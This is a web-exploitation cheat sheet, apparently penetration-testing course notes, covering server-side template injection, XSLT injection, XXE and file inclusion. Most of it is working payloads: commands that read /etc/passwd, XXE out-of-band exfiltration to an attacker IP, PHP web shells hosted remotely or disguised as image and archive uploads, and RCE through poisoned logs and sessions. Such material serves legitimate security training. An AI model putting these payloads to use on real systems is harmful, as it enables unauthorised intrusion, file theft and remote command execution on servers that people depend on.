Jinja2 basic injection

{{ [].class.base.subclasses() }}

Jinja2 dump all classes payload

{% import os %}{{os.system('whoami')}}

Tornado payload

{{7*'7'}}

Confirming Jinja2 backend

./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'

Automating with tplmap

XSLT Injection

<xsl:template>	 # This element indicates an XSL template. It can contain a match attribute that contains a path in the XML-document that the template applies to
<xsl:value-of>	 # This element extracts the value of the XML node specified in the select attribute
<xsl:for-each>	 # This element enables looping over all XML nodes specified in the select attribute
<xsl:sort>	 # This element specifies the node to sort elements in a for loop by in the select argument. Additionally, a sort order may be specified in the order argument
<xsl:if>	 # This element can be used to test for conditions on a node. The condition is specified in the test argument

# Injection Payloads
# Information Disclosure
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
<xsl:value-of select="system-property('xsl:product-name')" />
<xsl:value-of select="system-property('xsl:product-version')" />

# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

# RCE
<xsl:value-of select="php:function('system','id')" />

XXE

Code

Description

<!ENTITY xxe SYSTEM "http://localhost/email.dtd">

Define External Entity to a URL

<!ENTITY xxe SYSTEM "file:///etc/passwd">

Define External Entity to a file path

<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">

Read PHP source code with base64 encode filter

<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

Reading a file through a PHP error

<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

Reading a file OOB exfiltration

File Inclusion

Local File Inclusion LFI

Command

Description

/etc/passwd

Basic LFI

../../../../etc/passwd

LFI with path traversal

....//....//....//....//etc/passwd

Bypass basic path traversal filter

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

Bypass filters with URL encoding

/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

Bypass appended extension with path truncation (obsolete)

../../../../etc/passwd%00

Bypass appended extension with null byte (obsolete)

php://filter/read=convert.base64-encode/resource=config

Read PHP with base64 filter

Remote Code Execution

Command

Description

PHP Wrappers

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

RCE with data wrapper

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"

RCE with input wrapper

http://<SERVER_IP>:<PORT>/index.php?language=expect://id

RCE with expect wrapper

RFI

echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>

Host web shell

/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

Include remote PHP web shell

LFI + Upload

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

Create malicious image

/index.php?language=./profile_images/shell.gif&cmd=id

RCE with malicious uploaded image

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

Create malicious zip archive 'as jpg'

/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

RCE with malicious uploaded zip

php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

Create malicious phar 'as jpg'

/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

RCE with malicious uploaded phar

Log Poisoning

/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd

Read PHP session parameters

%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

Poison PHP session with web shell

/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

RCE through poisoned PHP session

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'

Poison server log

/var/log/apache2/access.log&cmd=id

RCE through poisoned Apache access log

C:\xampp\apache\logs\

Apache log files on windows XAMPP

# PHP Wrappers
php://filter/read=string.rot13/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/convert.base64-encode/resource=index.php
pHp://FilTer/convert.base64-encode/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=dir
expect://id
expect://ls

Misc

File Inclusion Functions

Function                      Read Content   Execute   Remote URL

PHP
include()/include_once()      Yes            Yes       Yes
require()/require_once()      Yes            Yes       No
file_get_contents()           Yes            No        Yes
fopen()/file()                Yes            No        No

NodeJS
fs.readFile()                 Yes            No        No
res.sendFile()                Yes            No        No
res.render()                  Yes            Yes       No

Java
include                       Yes            No        No
import                        Yes            Yes       Yes

.NET
@Html.Partial()               Yes            No        No
@Html.RemotePartial()         Yes            No        Yes
Response.WriteFile()          Yes            No        No
include                       Yes            Yes       Yes
